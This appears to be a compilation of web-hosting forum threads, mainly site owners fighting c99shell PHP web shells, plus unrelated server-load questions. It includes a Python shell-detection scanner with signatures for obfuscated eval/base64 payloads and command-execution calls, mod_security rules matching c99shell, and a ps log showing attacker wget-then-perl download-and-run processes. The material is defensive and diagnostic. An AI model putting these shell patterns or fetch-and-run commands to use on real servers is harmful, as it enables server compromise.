C99Shell Hackers Killing Me!
Guys, I'm tired of fighting these hackers every day! I have about 20 websites, and every day one of them gets hacked! I restore a backup, then another one is hacked!
That's unbelievable!!!
Those bastards upload their shell scripts to the websites via bugs or whatever in the PHP files!!
Is there any way to stop these commands?
Can .htaccess help? How?
I talked to my web hosting companies for my websites! ....
Related Forum Messages:
C99Shell :: How To Detect Or Disable The Functionality Of C99Shell
Recently my site was defaced (I own a dedicated server). My server was not touched, but one of the applications I used on the site was exploited to gain access to it. I have noticed 4 or 5 c99 shells in different locations on my FTP. The site is back online, but it's definitely possible that they have one of these hidden somewhere and that they'll just do it again. I am using CentOS 5. How can I easily search for these on my box? Can I disable their functionality? Is there a setting I can use in .htaccess or something to make my website safer? I visited one of the scripts, and it said SAFEMODE OFF; how can I at least enable safe mode? I don't know much of anything about Linux, but I am running cPanel and WHM. I have a guy who manages my box, but he is hard to get hold of sometimes, and I'd like to take care of this ASAP!
C99Shell Folders?
I found these folders in the root:
/usr/bin/c99
/usr/include/boost/numeric/interval/detail/c99_rounding_control.hpp
/usr/include/boost/numeric/interval/detail/c99sub_rounding_control.hpp
What are these? Are they normal folders, or has somebody hacked our server? What shall I do?
Trojan C99Shell
I just installed Zen Cart on my web hosting, and a few days later I saw some files named like core1405.php; when I opened one to view it, it was actually the c99shell trojan. I have deleted all of the core files. Now how can I prevent it from happening again? It is too much work to clean up the hosting server.
Mod_security & C99shell Anyone Help Please ?
I installed mod_security from the addon modules in cPanel. When I try a PHP shell, it works fine without any errors and I can do anything, despite the presence of mod_security protection and disable_functions in php.ini. Are there particular settings to add to httpd.conf to prevent a PHP shell from running, or to prevent it from being uploaded to the site?
C99shell Disable PHP Scripts?
The biggest security issue I have with my clients is the PHP c99 shell and similar PHP files. Somehow these files get uploaded to the website, and from there they start attacking the websites. I have also seen that once you upload the c99 PHP file you are able to see the account information (such as user names) on the same server. So is there any way to disable this kind of PHP file, or at least disable some functions within the file? I have been thinking of installing and running an antivirus on the server, but I see that sometimes they upload an encrypted version of the file, so the antivirus can't catch the file as a trojan!
C99Shell :: Attack Rules For Mod_security
I want to prevent c99shell scripts from running. I found this rule to detect URIs for the c99 shell:
#new kit
SecFilterSelective REQUEST_URI "/c99shell.txt"
SecFilterSelective REQUEST_URI "/c99.txt?"
My problem is that the hackers are being more stealthy and calling the script some random name like .../myphpstuff.php, so the URI no longer helps detect it. How could I detect "c99shell" in the actual file that Apache serves? This assumes that the hacker was successful in installing it. My box: Apache 1.3.37, WHM 11.2.0, cPanel 11.11.0-R16983, FEDORA 5 i686 - WHM X v3.1.0
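The questions in this thread (finding the c99 shells left on a CentOS box, catching a copy renamed to myphpstuff.php, and the "encrypted" variants an antivirus misses) all come down to scanning file contents rather than URIs or file names. The following is an added example, not code from any of the posters: a Python scanner that walks a document root and scores every file against content signatures, so an obfuscated eval(gzinflate(base64_decode(...))) wrapper is caught even when the word c99shell never appears. The signature list, the weights and the threshold are my assumptions and will need tuning per host; run with no argument it scans two constructed sample files in a temp directory.

```python
import os
import re
import sys
import tempfile

# Weighted content signatures. Assumption: these fit c99/r57-style PHP shells
# and the eval(gzinflate(base64_decode(...))) wrappers used to hide them;
# tune the list and weights for your own hosting environment.
SIGNATURES = [
    (re.compile(rb"c99shell|r57shell|c100shell|shellbot", re.I),
     10, "known shell name"),
    (re.compile(rb"\b(?:eval|assert)\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I),
     8, "eval() of a decoded payload"),
    (re.compile(rb"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)", re.I),
     8, "command execution fed from request data"),
    (re.compile(rb"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I),
     3, "command execution function"),
    (re.compile(rb"safe_mode|disable_functions|open_basedir", re.I),
     2, "probes PHP restrictions"),
    (re.compile(rb"[A-Za-z0-9+/]{300,}={0,2}"),
     4, "long base64 blob"),
]
THRESHOLD = 8                 # report files scoring at least this much
MAX_SIZE = 4 * 1024 * 1024    # skip anything larger (images, archives)


def scan_bytes(data):
    """Score one file's content; returns (score, [matched reasons])."""
    score, reasons = 0, []
    for pattern, weight, reason in SIGNATURES:
        if pattern.search(data):
            score += weight
            reasons.append(reason)
    return score, reasons


def scan_tree(root, threshold=THRESHOLD):
    """Walk root and return [(path, score, reasons)] for files at or above threshold."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Do not descend into symlinked directories: a planted link can loop or
        # point the scan outside the docroot.
        dirnames[:] = [d for d in dirnames if not os.path.islink(os.path.join(dirpath, d))]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if os.path.islink(path) or os.path.getsize(path) > MAX_SIZE:
                    continue
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            score, reasons = scan_bytes(data)
            if score >= threshold:
                hits.append((path, score, reasons))
    return sorted(hits, key=lambda hit: -hit[1])


# Constructed samples for the stand-alone run; not taken from any real server.
SHELL_SAMPLE = (b"<?php /* myphpstuff.php */ eval(gzinflate(base64_decode('"
                + b"eJxLK" * 80 + b"'))); ?>")
BENIGN_SAMPLE = b"<?php echo 'Hello, world'; ?>"


def demo():
    """Write the samples into a temp dir, scan it, return [(file name, score, reasons)]."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "core1405.php"), "wb") as fh:
            fh.write(SHELL_SAMPLE)
        with open(os.path.join(root, "index.php"), "wb") as fh:
            fh.write(BENIGN_SAMPLE)
        return [(os.path.basename(p), s, r) for p, s, r in scan_tree(root)]


if __name__ == "__main__":
    # Usage: python scan_shells.py /home   (no argument: scan the constructed samples)
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for path, score, reasons in results:
        print(f"{score:3d}  {path}  ({', '.join(reasons)})")
```

The "long base64 blob" and "command execution function" signatures fire on legitimate code too, which is why they carry low weights and the report is a ranked list to review rather than a delete list; a file that hits both the eval-of-decoded-payload and the blob signature is almost always worth opening.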
Layeredtech Killing Itself
I remember a long time ago when I used to host on Layered Tech: fast network, good stuff, affordable price. My first server cost me 90 dollars on Layered Tech with about a 20 dollar one-time setup fee. I visited today after about 2 years and I'm pretty surprised to see their prices; they are by no means as affordable as they were previously, and the setup fee is now 50 dollars on every server. With such a large number of servers in their data centers, shouldn't they be able to make them affordable? Yet I have seen the same server in the WHT ads section for a fraction of the price LT expects, not to mention the excessive setup fee. I'm not complaining, it's their business, but is it really helping them? I can't be the only person feeling this anti-love for Layered Tech. Being a former LT customer, I had no problems with them or their services; I just left after I sold my site and moved to a VPS. But seeing the new prices is a bit shocking.
Gzip Is Killing My Server
From top:
  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
12478 root      35  19  2004  680  308 R   39  0.0  8:54.95 gzip
It has been using anywhere from 30-50% of my CPU for nearly 10 min now, but no memory usage. Any ideas? Should I kill the PID? The site is running pretty slow as a result of this.
VPS RAM Is Killing
I have a VPS with 768 MB of RAM, which was always suitable for the websites I'm hosting, as most of them are not popular and none of them has had high traffic recently at all. But for over 2 days the VPS has been eating the RAM and killing all the services (cPanel/httpd/FTP/MySQL...). I want to know what is causing this and stop it by any means. I contacted my VPS support and they told me to type "top" in SSH, but I didn't understand anything from what I saw, and I didn't know what to do after running that command.
Mysql Is Killing My Vps
The server load averages on my VPS have been very high, escalating to 6.5 in some cases. The process causing this is:
Pid   Owner  Priority  Cpu %  Mem %  Command
7370  mysql  -10       76.7   3.0    /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/opal.ngwebservers.net.pid --skip-external-locking
My VPS is hosted by Virpus Networks and has the spec: 512 MB RAM (1024 burstable), 10 GB hard drive space. 8 of these processors on the node: Processor #1 Vendor: GenuineIntel; Processor #1 Name: Intel(R) Xeon(TM) CPU 2.80GHz; Processor #1 speed: 174.594 MHz; Processor #1 cache size: 2048 KB. No hardware or software changes were implemented on the VPS as far as I am aware. The MySQL process causing this is:
Id     User         Host       db           Command  Time  State                 Info
28993  movies_mybb  localhost  movies_mybb  Query    36    Copying to tmp table  SELECT t.tid, t.dateline, p.edittime, t.subject, f.allowhtml, f.allowmycode, f.allowsmilies, f.allow
This has been going on since I first saw the loads go high...
VRTServers.net Is KILLING Me
I have many servers on vrtservers.net and was happy with their support, and I was planning to be a reseller of theirs. But the nightmare came yesterday. My main server got a SPAM report from spamcap.net [url]; the spamcap.net report said my server was running an open proxy and somebody was using it for SPAM. Before the SPAM report, I knew about this issue and had fixed it, so the proxy only ran for a few hours (check the MRTG graph [url]). Since the SPAM report, vrtservers.net has put this server offline. I can understand that. I contacted support@vrtservers.net instantly, and I proceeded with the spamcap.net case too. But the nightmare is... when I asked vrtservers.net "how do I reconnect my servers / when will the case be closed?", vrtservers.net replied saying the server had been terminated and there is no way to get my data back. My god... all of my server's data has been lost! vrtservers.net is killing me now!
Spamd Is Killing My VPS
I have a VPS with 320 MB of RAM. The problem is that SpamAssassin is killing my VPS. The spamd service was using 50% of memory (about 150 MB of RAM). Do you think that this is normal RAM usage for spamd?
Httpd Is Killing My Server
24 hours ago something weird happened. For some reason httpd is causing high server load. ATM: 22:44:17 up 22:17, 2 users, load average: 6.23, 6.12, 8.88. It will keep going up, and httpd needs to be restarted when the server load reaches 30. The traffic on the server is normal; no changes were made on the server.
Mod_security Killing Php
Trying to get mod_security installed on my HSphere server. The install goes OK until I try to load rules. If I just load the exclude.conf rule then PHP sites work, but if I also load rules.conf or any other rules then my PHP sites get a 'connection refused' error. I cannot find anything in the logs, and there is no log written for mod_security. Here is my modsecurity.conf:
Quote:
#If you want to scan the output, uncomment these
#SecFilterScanOutput On
#SecFilterOutputMimeTypes "(null) text/html text/plain"
# Accept almost all byte values
SecFilterForceByteRange 1 255
# Server masking is optional
#fake server banner - NOYB used - no one needs to know what we are using
SecServerSignature "NOYB"
#SecUploadDir /tmp
#SecUploadKeepFiles Off
# Only record the interesting stuff
SecAuditEngine RelevantOnly
SecAuditLog /var/log/audit_log
# You normally won't need debug logging
SecFilterDebugLevel 0
SecFilterDebugLog logs/modsec_debug_log
#And now, the rules
#Remove any of these Include lines you do not use or have rules for.
#First, add in your exclusion rules:
#These MUST come first!
Include /etc/modsecurity/exclude.conf
#Application protection rules
#Include /etc/modsecurity/rules.conf

bash-2.05b# cat /etc/modsecurity.conf
<IfModule mod_security.c>
# Only inspect dynamic requests
# (YOU MUST TEST TO MAKE SURE IT WORKS AS EXPECTED)
#SecFilterEngine DynamicOnly
SecFilterEngine On
# Reject requests with status 500
SecFilterDefaultAction "deny,log,status:500"
# Some sane defaults
SecFilterScanPOST On
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat On
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies On
# enable version 1 (RFC 2965) cookies
SecFilterCookieFormat 1
SecServerResponseToken Off
#If you want to scan the output, uncomment these
#SecFilterScanOutput On
#SecFilterOutputMimeTypes "(null) text/html text/plain"
# Accept almost all byte values
SecFilterForceByteRange 1 255
# Server masking is optional
#fake server banner - NOYB used - no one needs to know what we are using
SecServerSignature "NOYB"
#SecUploadDir /tmp
#SecUploadKeepFiles Off
# Only record the interesting stuff
SecAuditEngine RelevantOnly
SecAuditLog /var/log/audit_log
# You normally won't need debug logging
SecFilterDebugLevel 0
SecFilterDebugLog logs/modsec_debug_log
#And now, the rules
#Remove any of these Include lines you do not use or have rules for.
#First, add in your exclusion rules:
#These MUST come first!
Include /etc/modsecurity/exclude.conf
#Application protection rules
#Include /etc/modsecurity/rules.conf
#Comment spam rules
#Include /etc/modsecurity/blacklist.conf
#Bad hosts, bad proxies and other bad players
##Include /etc/modsecurity/blacklist2.conf
#Bad clients, known bogus useragents and other signs of malware
##Include /etc/modsecurity/useragents.conf
#Known bad software, rootkits and other malware
##Include /etc/modsecurity/rootkits.conf
#Signatures to prevent proxying through your server
#only rule these rules if your server is NOT a proxy
##Include /etc/modsecurity/proxy.conf
#Just in Time Patching for Vulnerable Applications
##Include /etc/modsecurity/jitp.conf
#Google Hacks signatures
##Include /etc/modsecurity/recons.conf
#Include /etc/modsecurity/
</IfModule>
Is CPanel Killing My VPS
I have a VPS with 256 MB guaranteed RAM, and I have cPanel. A couple of days ago I got to fiddling with a database issue and had phpMyAdmin open for the better part of an hour. So I got to wondering what something like that does to my VPS. A secondary question: same thing, but on a dedicated server with 1 GB RAM?
Backups Killing My Server
Opt 248, 3 GB RAM, 250 GB SATA II. I have a fairly unique problem. My server runs great 95% of the time; load averages under 1. However, backups have become a server killer. I use the cPanel scheduled backup in the early morning hours. The reason backups kill my server is that I have 300,000+ (and counting) images in a directory. They are all small PNGs generated by LaTeX. It takes my server several hours to back up the images. I usually even have to stop Apache to free up some power. This problem is only going to get worse as I get more images. Maybe I could upgrade the processor or upgrade to a faster HD? That would be costly; hopefully not. Should I hire a professional backup service? Costly, and would that help? Or is there a way of storing the images, or of doing the cpbackup, that I am doing wrong?
Iptables: Which One Of My Rules Is Killing Nslookup
One of these rules is causing name server lookups to fail, but I can't seem to figure out which one. Can anyone spot the problem?
Code:
[root@example ~]# iptables -L -n
Chain INPUT (policy DROP)
target     prot opt source               destination
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0
INVDROP    all  --  0.0.0.0/0            0.0.0.0/0           state INVALID
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x3F/0x00
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x3F/0x3F
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x03/0x03
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x06/0x06
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x05/0x05
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x11/0x01
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x18/0x08
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x30/0x20
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:20
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:21
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:22
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:25
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:53
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:80
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:110
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:143
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:443
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:465
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:953
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:993
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:995
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:10023
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           state NEW udp dpt:20
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           state NEW udp dpt:21
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           state NEW udp dpt:53
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           state NEW udp dpt:953
ACCEPT     icmp --  0.0.0.0/0            0.0.0.0/0           state NEW icmp type 8
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp spt:53 dpt:53
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           udp spt:53 dpt:53
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp spt:53 dpts:1024:65535
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           udp spt:53 dpts:1024:65535
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp spts:1024:65535 dpt:53
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           udp spts:1024:65535 dpt:53
LOGDROPIN  all  --  0.0.0.0/0            0.0.0.0/0

Chain FORWARD (policy DROP)
target     prot opt source               destination

Chain OUTPUT (policy DROP)
target     prot opt source               destination
INVDROP    all  --  0.0.0.0/0            0.0.0.0/0           state INVALID
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x3F/0x00
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x3F/0x3F
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x03/0x03
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x06/0x06
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x05/0x05
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x11/0x01
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x18/0x08
INVDROP    tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x30/0x20
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:20
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:21
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:22
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:25
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:53
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:80
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:110
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:113
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:443
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:953
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:10023
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           state NEW tcp dpt:9999
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           state NEW udp dpt:20
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           state NEW udp dpt:21
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           state NEW udp dpt:53
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           state NEW udp dpt:113
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           state NEW udp dpt:123
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           state NEW udp dpt:953
ACCEPT     icmp --  0.0.0.0/0            0.0.0.0/0           state NEW icmp type 8
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp spt:53 dpt:53
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           udp spt:53 dpt:53
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp spts:1024:65535 dpt:53
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           udp spts:1024:65535 dpt:53
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp spt:53 dpts:1024:65535
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           udp spt:53 dpts:1024:65535
LOGDROPOUT all  --  0.0.0.0/0            0.0.0.0/0

Chain INVDROP (18 references)
target     prot opt source               destination
DROP       all  --  0.0.0.0/0            0.0.0.0/0

Chain LOGDROPIN (1 references)
target     prot opt source               destination
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:67
DROP       udp  --  0.0.0.0/0            0.0.0.0/0           udp dpt:67
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:68
DROP       udp  --  0.0.0.0/0            0.0.0.0/0           udp dpt:68
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:111
DROP       udp  --  0.0.0.0/0            0.0.0.0/0           udp dpt:111
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:113
DROP       udp  --  0.0.0.0/0            0.0.0.0/0           udp dpt:113
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpts:135:139
DROP       udp  --  0.0.0.0/0            0.0.0.0/0           udp dpts:135:139
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:445
DROP       udp  --  0.0.0.0/0            0.0.0.0/0           udp dpt:445
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:513
DROP       udp  --  0.0.0.0/0            0.0.0.0/0           udp dpt:513
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:520
DROP       udp  --  0.0.0.0/0            0.0.0.0/0           udp dpt:520
LOG        tcp  --  0.0.0.0/0            0.0.0.0/0           limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_IN Blocked* '
LOG        udp  --  0.0.0.0/0            0.0.0.0/0           limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_IN Blocked* '
LOG        icmp --  0.0.0.0/0            0.0.0.0/0           limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_IN Blocked* '
DROP       all  --  0.0.0.0/0            0.0.0.0/0

Chain LOGDROPOUT (1 references)
target     prot opt source               destination
LOG        tcp  --  0.0.0.0/0            0.0.0.0/0           limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_OUT Blocked* '
LOG        udp  --  0.0.0.0/0            0.0.0.0/0           limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_OUT Blocked* '
LOG        icmp --  0.0.0.0/0            0.0.0.0/0           limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_OUT Blocked* '
DROP       all  --  0.0.0.0/0            0.0.0.0/0
Nobody_check Killing Spamd Process
My nobody_check is killing a process that seems to be OK, but I'm not sure. The process is running /usr/bin/perl-bin, which I have never heard of. I thought it was /usr/bin/perl. Should I be concerned? Again, I don't know what /perl-bin is.
Process ID: 28457 has been killed
Results for PID: 28457
total 0
dr-xr-xr-x   3 nobody nobody 0 Jul 23 17:00 .
dr-xr-xr-x 201 root   root   0 Jun 29 11:59 ..
dr-xr-xr-x   2 root   root   0 Jul 23 17:00 attr
-r--------   1 root   root   0 Jul 23 17:00 auxv
-r--r--r--   1 root   root   0 Jul 23 17:00 cmdline
lrwxrwxrwx   1 root   root   0 Jul 23 17:00 cwd -> /
-r--------   1 root   root   0 Jul 23 17:00 environ
lrwxrwxrwx   1 root   root   0 Jul 23 17:00 exe -> /usr/bin/perl-bin
dr-x------   2 root   root   0 Jul 23 17:00 fd
-rw-r--r--   1 root   root   0 Jul 23 17:00 loginuid
-r--------   1 root   root   0 Jul 23 17:00 maps
-rw-------   1 root   root   0 Jul 23 17:00 mem
-r--r--r--   1 root   root   0 Jul 23 17:00 mounts
lrwxrwxrwx   1 root   root   0 Jul 23 17:00 root -> /
-r--r--r--   1 root   root   0 Jul 23 17:00 stat
-r--r--r--   1 root   root   0 Jul 23 17:00 statm
-r--r--r--   1 root   root   0 Jul 23 17:00 status
dr-xr-xr-x   3 root   root   0 Jul 23 17:00 task
-r--r--r--   1 root   root   0 Jul 23 17:00 wchan
Netstat:
tcp        0      0 127.0.0.1:783           127.0.0.1:40957         CLOSE_WAIT  28457/spamd child
udp        0      0 xx.xxx.xxx.xx:41008     216.52.190.1:53         ESTABLISHED 28457/spamd child
unix  3      [ ]         STREAM     CONNECTED     120878416 28457/spamd child
unix  2      [ ]         DGRAM                    120872220 28457/spamd child
unix  2      [ ]         STREAM     CONNECTED     120847759 28457/spamd child
unix  2      [ ]         STREAM     CONNECTED     120832442 28457/spamd child
Environ:

Process ID: 23944 has been killed
Results for PID: 23944
total 0
dr-xr-xr-x   3 nobody nobody 0 Jul 23 16:55 .
dr-xr-xr-x 206 root   root   0 Jun 29 11:59 ..
dr-xr-xr-x   2 root   root   0 Jul 23 17:00 attr
-r--------   1 root   root   0 Jul 23 17:00 auxv
-r--r--r--   1 root   root   0 Jul 23 16:55 cmdline
lrwxrwxrwx   1 root   root   0 Jul 23 17:00 cwd -> /
-r--------   1 root   root   0 Jul 23 17:00 environ
lrwxrwxrwx   1 root   root   0 Jul 23 16:55 exe -> /usr/bin/perl-bin
dr-x------   2 root   root   0 Jul 23 17:00 fd
-rw-r--r--   1 root   root   0 Jul 23 17:00 loginuid
-r--------   1 root   root   0 Jul 23 17:00 maps
-rw-------   1 root   root   0 Jul 23 17:00 mem
-r--r--r--   1 root   root   0 Jul 23 17:00 mounts
lrwxrwxrwx   1 root   root   0 Jul 23 17:00 root -> /
-r--r--r--   1 root   root   0 Jul 23 16:55 stat
-r--r--r--   1 root   root   0 Jul 23 16:55 statm
-r--r--r--   1 root   root   0 Jul 23 16:55 status
dr-xr-xr-x   3 root   root   0 Jul 23 17:00 task
-r--r--r--   1 root   root   0 Jul 23 17:00 wchan
Netstat:
tcp        1      0 127.0.0.1:783           127.0.0.1:40955         CLOSE_WAIT  23944/spamd child
udp        0      0 xx.xx.xxx.xxx:55606     216.52.190.1:53         ESTABLISHED 23944/spamd child
unix  3      [ ]         STREAM     CONNECTED     120847760 23944/spamd child
unix  2      [ ]         STREAM     CONNECTED     120832442 23944/spamd child
unix  2      [ ]         DGRAM                    120677444 23944/spamd child
Environ:
Hackers
I have been constantly battling hackers over the last week, and I have to admit I'm not really sure what it is that is letting them in, but they're getting in... The processes all run as "apache", so clearly it's the web server somehow. I've changed the SSH port, disabled cron for the apache user and set PHP safe_mode on for the site I think might be to blame, but still no luck. Logged in this morning to be greeted by this...
Quote:
[root@s15247463 httpdocs]# ps -fe | grep apache
apache    2889  2220  1 Dec26 ?        00:18:36 /usr/sbin/httpd
apache    2891  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
apache    2892  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache    2893  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache    2894  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
apache    2895  2220  0 Dec26 ?        00:00:05 /usr/sbin/httpd
apache    2896  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   14664  2220  0 Dec26 ?        00:00:03 /usr/sbin/httpd
apache   32714     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
apache   32719     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
apache   19751  2894  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   19764     1 23 Dec26 ?        03:31:35 shellbot
apache   28642  2220  0 Dec26 ?        00:00:04 /usr/sbin/httpd
apache   28662  2891  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   28666     1 22 Dec26 ?        03:23:10 shellbot
apache   29532  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
apache   29933  2220  0 Dec26 ?        00:07:18 /usr/sbin/httpd
apache   20833  2893  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20838     1 13 Dec26 ?        01:21:35 [httpds]
apache   20847 29532  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20853     1 13 Dec26 ?        01:21:33 [httpds]
apache   20870  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   20879  2892  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20884     1 13 Dec26 ?        01:21:28 [httpds]
apache   20887  2896  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20892     1 13 Dec26 ?        01:21:16 [httpds]
apache   20895  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
apache   20896  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   20901  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   21445  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
apache    1875     1  0 00:01 ?        00:00:00 [httpds]
apache    2237     1  0 00:14 ?        00:00:00 ./mocks start
apache    5465 20895  0 00:23 ?        00:00:00 [sh] <defunct>
apache    5477     1  6 00:23 ?        00:24:48 shellbot
apache   10110 14664  0 01:00 ?        00:00:00 [sh] <defunct>
apache   10142     1 11 01:00 ?        00:44:09 shellbot
apache   10537  2220  0 01:27 ?        00:00:01 /usr/sbin/httpd
apache   13780     1  0 02:28 ?        00:00:00 [httpds]
apache   13781 13780  0 02:28 ?        00:00:00 sh -c wget [url] -O [url]
apache   13784     1  0 02:28 ?        00:00:00 [httpds]
apache   13785 13784  0 02:28 ?        00:00:00 sh -c wget [url] -O [url]
apache   13788     1  0 02:28 ?        00:00:00 [httpds]
apache   13789 13788  0 02:28 ?        00:00:00 sh -c wget [url] -O [url]
apache   13792     1  0 02:28 ?        00:00:00 [httpds]
apache   13793 13792  0 02:28 ?        00:00:00 sh -c wget [url] -O [url]
apache   13798 13789  0 02:29 ?        00:00:00 perl test.txt
apache   13802 13781  0 02:29 ?        00:00:00 perl test.txt
apache   13806 13793  0 02:29 ?        00:00:00 perl test.txt
apache   13810 13785  0 02:29 ?        00:00:00 perl test.txt
apache   22282  2220  0 03:40 ?        00:00:00 /usr/sbin/httpd
apache   22434 20896  0 03:51 ?        00:00:00 [sh] <defunct>
